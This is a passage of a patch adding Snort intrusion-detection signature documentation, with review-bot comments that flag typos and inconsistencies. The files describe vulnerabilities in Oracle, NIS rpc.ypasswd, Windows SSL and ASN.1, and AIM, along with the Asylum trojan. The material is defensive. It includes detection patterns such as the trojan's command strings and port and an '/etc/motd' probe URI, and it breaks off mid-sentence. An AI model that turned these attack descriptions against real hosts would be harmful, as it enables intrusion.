+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
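Review bot: Same boilerplate as 1214.txt and 1173.txt with only the Sid changed; see the comment on 1214.txt. At minimum the Summary should say which request pattern SID 1584 matches, and Additional References should cite it.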
--- /dev/null
+++ b/doc/signatures/2718.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2718
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure rectify
+. This procedure is included in
+dbms_rectifier_diff.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
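Review bot: Same template artifact as in 2766.txt: "vulnerability in the procedure rectify" is followed by a line beginning ". This procedure is included in", leaving a line break before the period; join it into one sentence ending "rectify. This procedure is included in dbms_rectifier_diff." "Oracle Oracle9i" doubles the vendor name, the "-- " separators carry trailing whitespace, and Additional References is empty.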
--- /dev/null
+++ b/doc/signatures/1371.txt
@@ -0,0 +1,49 @@
+Rule:
+
+--
+Sid:
+1371
+
+--
+Summary:
+This event is generated when an attempt is made to access the message of the day (motd) via the web
+
+--
+Impact:
+Attempt to gain information about the system on a webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence about the system hosting a webserver. The motd is used to display system information on a UNIX or Linux based system. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/etc/motd' in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This file may also be requested on a command line should the attacker gain access to the machine. Making the file read only by the superuser on the system will disallow viewing of the file by other users.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
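Review bot: The Affected Systems section is missing (the file jumps from Detailed Information to Attack Scenarios). In Corrective Action, "it's designated web root" should be "its", and the sentence "This file may also be requested on a command line should the attacker gain access to the machine" is an attack scenario, not a corrective action; move it to Attack Scenarios. There is no blank line before the "--" that follows Corrective Action, and the Summary and Impact lines lack terminating periods.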
--- /dev/null
+++ b/doc/signatures/2029.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2029
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
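Review bot: "Apply pacthes" under Corrective Action is a typo for "patches". Please also confirm the spelling of the service and command throughout the file: the text writes "ypasswd" and "rpc.ypasswd", whereas the NIS password-change client and daemon are conventionally spelled yppasswd and rpc.yppasswdd; if the rule message itself uses the single-p form, keep the documentation consistent with the rule, otherwise correct it. In Detailed Information, "An exploit for this vulnerability exists, hosts that have been compromised ..." is a comma splice and should be two sentences. The observation that compromised hosts "typically display two instances of inetd" with a root shell on port 77 is the most useful detection guidance in the file and belongs under Corrective Action next to the "check the host" advice, where a responder will look for it.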
--- /dev/null
+++ b/doc/signatures/3013.txt
@@ -0,0 +1,85 @@
+Rule: 
+
+--
+Sid: 
+3013
+-- 
+Summary: 
+This event is generated when an attacker attempts to connect to the
+victim using the Asylum 0.1 trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to the
+system, enabling him to upload and execute files on the computer and
+reboot it at will, resulting in a full compromise of the victim's computer. 
+
+--
+Detailed Information:
+When executed, Asylum 0.1 opens up its assigned port (default is 23432)
+for communication with the attacker. Asylum 0.1 has four functions:
+Upload File, Open File, Reboot Computer, and Remove Server. 
+
+Upload File: Look for traffic on port 23432 containing UPL followed by a file location.
+Open File: Look for traffic on port 23432 containing RUN followed by a file location.
+Reboot: Look for the string "RBT" on port 23432.
+Remove Server: Look for the string "DIE" on port 23432.
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoors in disguise. Once the victim
+mistakenly installs the server program, the attacker usually will employ
+an IP scanner program to find the IP addresses of victims that have
+installed the program. Then the attacker enters the IP address, port
+number (which  is assigned to the server program by the attacker:
+default is 23432), and presses the connect button and he has access to
+the computer.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action:
+
+Delete the System Administration key (if found) in 
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run or
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices or
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
+
+Open the system.ini and (if found) replace shell=Explore.exe win32cmp.exe to shell=explore.exe
+
+Open the win.ini and (if found) delete load=c:\windows\wincmp32.exe or run=c:\windows\wincmp32.exe
+
+Find and delete the Asylum 0.1 trojan server file, usually called wincmp32.exe.
+
+Keep anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com>
+
+-- 
+Additional References:
+
+PestPatrol:
+http://www.pestpatrol.com/PestInfo/A/Asylum.asp
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/asylum/01/index.shtml
+
+--
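Review bot: the Corrective Action steps name the trojan file inconsistently: the system.ini line says "win32cmp.exe" while the win.ini line and the "Find and delete the Asylum 0.1 trojan server file" line say "wincmp32.exe"; one of these is wrong and a reader following the steps will miss the file. "replace shell=Explore.exe win32cmp.exe to shell=explore.exe" also looks like it should name Explorer.exe (the Windows shell binary) and use the form "replace X with Y". Under Attack Scenarios, "Be wary of suspicious files because they often can be backdoors in disguise" is advice rather than a scenario and fits under Corrective Action. Minor: the Sid block lacks the blank line before "-- " that the other files use.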
--- /dev/null
+++ b/doc/signatures/2500.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2500
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
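Review bot: "An attcker needs to make an SSL request" under Attack Scenarios is a typo for "attacker". The body of this file is identical to 2540.txt later in the patch, but 2540.txt carries a US-CERT reference (TA04-104A) while this file's Additional References section is empty; the same reference applies here, and each of the two files should state what distinguishes its rule from the other, since the documentation currently gives an analyst no way to tell sid 2500 from sid 2540. Also "Denial of Service (DoS)." is not followed by the blank line the other sections use before "--", and "Apply the appropriate vendor supplied patches" lacks a period.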
--- /dev/null
+++ b/doc/signatures/2152.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a script not normally used in a production environment. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a test script (test.php) that would not normally be used in a production environment.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+In applications such as Horde or IMP, the test.php script may reveal valuable server information to the attacker.
+
+--
+Affected Systems:
+Any host using php applications such as Horde or IMP.
+
+Other php applications may use a file named test.php also.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If the script test.php exists and is normally used, this rule will generate an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
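Review bot: the Sid field is empty (two blank lines follow "Sid:") although the file is doc/signatures/2152.txt; it should contain 2152, otherwise tooling that indexes these files by sid will skip it. Additional References is empty as well. The False Positives line ("If the script test.php exists and is normally used, this rule will generate an event") is the one place that states what the rule matches; repeating the matched path in the Summary would let the first line tell the reader what was requested.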
--- /dev/null
+++ b/doc/signatures/587.txt
@@ -0,0 +1,60 @@
+Rule:
+
+Sid:
+587
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) statd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port statd is using.  Attackers can also learn what versions of the statd protocol are accepted by statd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as statd run.  The statd RPC service manages Network File System (NFS) locks for exclusive access to a remote file. Multiple vulnerabilities that have allowed execution of arbitrary commands as root have been associated with statd.
+
+--
+Affected Systems:
+Multiple; refer to your vendor for specific information.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where statd runs.  This may be a precursor to accessing statd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access statd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for statd, not probes of the statd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the statd service itself. An attacker may attempt to go directly to the statd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS15
+
+
+--
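Review bot: the "--" separator between "Rule:" and "Sid:" is missing at the top of this file, unlike every other file in the patch; anything that splits sections on "--" will merge the two. Minor consistency points: "Arachnids" under Additional References lacks the colon the other files put after the source name, and there are stray double spaces after periods in Impact, Detailed Information, Attack Scenarios and "Simple.  " under Ease of Attack.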
--- /dev/null
+++ b/doc/signatures/687.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/incident_notes/IN-2002-04.html
+
+--
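Review bot: the Sid field is empty (only "Sid: " followed by a blank line) although the file is doc/signatures/687.txt; it should read 687. In Detailed Information, "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit" does not fit the rest of the file, which is about SQL database commands rather than a telnet or shell session, and reads as pasted from another signature; either drop it or explain how the command reaches the server. "Attack Scenarios: Simple. These are SQL database commands." answers the Ease of Attack question instead of describing a scenario; the actual scenario (administrator-level access, adding or deleting users or data) is already in the second Detailed Information paragraph and can be moved here. The extra blank lines after "--" before Summary, Attack Scenarios, Ease of Attack, False Positives and Corrective Action also differ from the layout used elsewhere in the patch.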
--- /dev/null
+++ b/doc/signatures/1183.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1183
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
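Review bot: nothing in this file says what sid 1183 actually matches: the Summary, Detailed Information and Attack Scenarios are generic web-server text ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion") that would apply to any web rule. Name the request, path or application the rule looks for, otherwise an analyst cannot triage the event from this page. Minor: "arbitrary code of the attackers choosing" needs an apostrophe ("attacker's"), and Additional References is empty.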
--- /dev/null
+++ b/doc/signatures/2386.txt
@@ -0,0 +1,74 @@
+Rule:  
+
+--
+Sid:
+2386
+
+--
+Summary:
+This event is generated when an attempt is made to scan for a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library using 
+Nessus.
+
+--
+Impact:
+Intelligence gathering.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+This event indicates a possible attempt to enumerate vulnerable hosts using 
+Nessus.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
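Review bot: the references heading is "References:" here but "Additional References:" in every other file, which will break anything that keys on the section name, and the "Attack Scenarios:" section is missing entirely (Affected Systems is followed directly by Ease of Attack). In Detailed Information the first sentence is a fragment ("A buffer overflow condition in the Microsoft implementation of the ASN.1 Library.") and "causing the DoS condition to occur" refers to a DoS condition that the Impact section ("Intelligence gathering.") never introduces; since this rule documents a Nessus scan rather than the exploit, trim the overflow description to what is needed to explain why the scan is worth alerting on. Typos: "taget" and "excuted".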
--- /dev/null
+++ b/doc/signatures/1482.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1482
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
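Review bot: this file is generic CGI text with no statement of what sid 1482 matches (which script or URI), and its body is repeated verbatim in 1658.txt later in the patch; each file should name the request its rule detects. Typos: "running ona web server" ("on a") and "attackers choosing" ("attacker's"). The line "relationships between the victim server and other hosts can be exploited by the attacker." runs well past the wrap width of the rest of the paragraph. Additional References is empty.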
--- /dev/null
+++ b/doc/signatures/2540.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2540
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
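Review bot: "An attcker needs" under Attack Scenarios is a typo for "attacker". The body is a verbatim copy of 2500.txt earlier in the patch, differing only in the US-CERT reference; add a sentence stating what distinguishes this rule from sid 2500 (for example which field or request form it matches), and copy the reference to 2500.txt so both files cite it. "Apply the appropriate vendor supplied patches" lacks a period.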
--- /dev/null
+++ b/doc/signatures/627.txt
@@ -0,0 +1,64 @@
+Rule:  
+ 
+--
+Sid:
+627
+
+--
+Summary:
+This event is generated when the Cybercop vulnerability scanner is used 
+against a host.
+
+--
+Impact:
+Cybercop can be used to identify vulnerabilities on host systems.
+
+--
+Detailed Information:
+This particular packet is a part of Cybercop's OS identification.  
+Specially crafted packets are able to elicit different responses from 
+different operating systems.  This packet is likely to be part of a full
+Cybercop scan rather than an isolated event. Having SYN, FIN, URG and 
+reserve bits 1 and 2 set at the same time is abnormal.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+Cybercop can be used by attackers to determine vulnerabilities present 
+on a host or network of hosts that could be used as attack vectors.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This tool can be used legitimately by system and network administrators.
+Other vulnerability scanners may display the same behavior.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+TCP packets with SYN, FIN, URG and reserved bits 1 and 2 set at the same
+time are abnormal, use a packet filtering firewall to block them.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS150
+
+--
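Review bot: Detailed Information says "reserve bits 1 and 2" while Corrective Action says "reserved bits 1 and 2"; use "reserved" in both. The Corrective Action sentence "are abnormal, use a packet filtering firewall to block them" is a comma splice and should be split ("... are abnormal. Use a packet filtering firewall to block them."). "Steven Alexander<alexander.s@mccd.edu>" is missing the space before the address that the other contributor lines have. The False Positives section correctly notes that other scanners may send the same flag combination, so the Summary ("when the Cybercop vulnerability scanner is used") states more than the packet alone shows; saying the packet is consistent with Cybercop OS identification would match Detailed Information better.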
--- /dev/null
+++ b/doc/signatures/1393.txt
@@ -0,0 +1,71 @@
+Nigel removed w00.w00 reference - no longer active
+
+Rule:
+
+--
+Sid:
+1393
+
+--
+Summary:
+This event is generated when exploit traffic is observed that attempts to cause a buffer overflow in a Windows host running America Online (AOL) Instant Messenger (AIM).
+
+--
+Impact:
+Attempted user level access.  A successful attack may permit the execution of arbitrary code with the privileges of the user running AIM.
+
+--
+Detailed Information:
+AIM can be used for message and file exchanges as well as to play games with other AIM users.  A buffer overflow exists in AIM game request code (AddGame) that may permit the execution of arbitrary code on a Windows client AIM host with the privileges of the user running AIM.  
+
+--
+
+Affected Systems:
+Windows hosts running AIM 4.3 - 4.8.2616.
+
+--
+Attack Scenarios:
+An attacker may craft a malformed AIM game request causing a buffer overflow, and potentially permitting the execution of arbitrary code with the privileges of the user running AIM. 
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This event is trigger when known exploit code is run.  It may be possible that other exploit code exists that will not trigger this event.
+
+--
+Corrective Action:
+
+ -Workstation:
+   Upgrade to version 2001B Beta v5.18 Build #3659 or later.
+
+    or
+
+   Go to Preferences in AIM -> Privacy ->
+   In "Who can contact me" check "Allow only users on my Buddy List".
+
+ -Network:
+   Block AIM traffic into and out of your network.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0005
+
+Bugtraq:
+http://www.securityfocus.com/bid/3769
+
+--
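Review bot: the first line, "Nigel removed w00.w00 reference - no longer active", is an editorial changelog note and should not ship inside the signature documentation file; drop it or move it to the commit message. "This event is trigger when known exploit code is run" under False Negatives should be "triggered". The blank line between "--" and "Affected Systems:" breaks the layout the other sections use, and the "-Workstation:" / "-Network:" sub-items under Corrective Action use a list style found nowhere else in the patch; fine if intended, but the other files present alternatives as separate paragraphs.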
--- /dev/null
+++ b/doc/signatures/2611.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2611
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+
+An attacker can create a database link and supply it an overly
+long string to the "USING" parameter of the "CREATE DATABASE LINK"
+command. This long value is stored for later use. When subsequently
+accessed via the link, a buffer overflow can occur.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i and earlier
+
+--
+Attack Scenarios:
+An attacker can create a database link and supply it an overly long
+"USING" value.  The result could permit the attacker to gain escalated
+privileges and run code of their choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0222
+
+Bugtraq
+http://www.securityfocus.com/bid/7453
+
+Other:
+http://archives.neohapsis.com/archives/bugtraq/2003-04/0360.html
+
+--
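Review bot: the paragraph "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"" is a rule-configuration instruction, not vulnerability detail, and sits under Detailed Information where a reader will skip it; move it to its own note near the Rule heading or to Corrective Action, and say why the setting matters, which the current text does not. "a Oracle database implementation" should be "an Oracle database implementation". "Bugtraq" under Additional References lacks the colon the other entries use, and the Affected Systems line is indented with spaces where the other files use a tab.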
--- /dev/null
+++ b/doc/signatures/3052.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3052
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
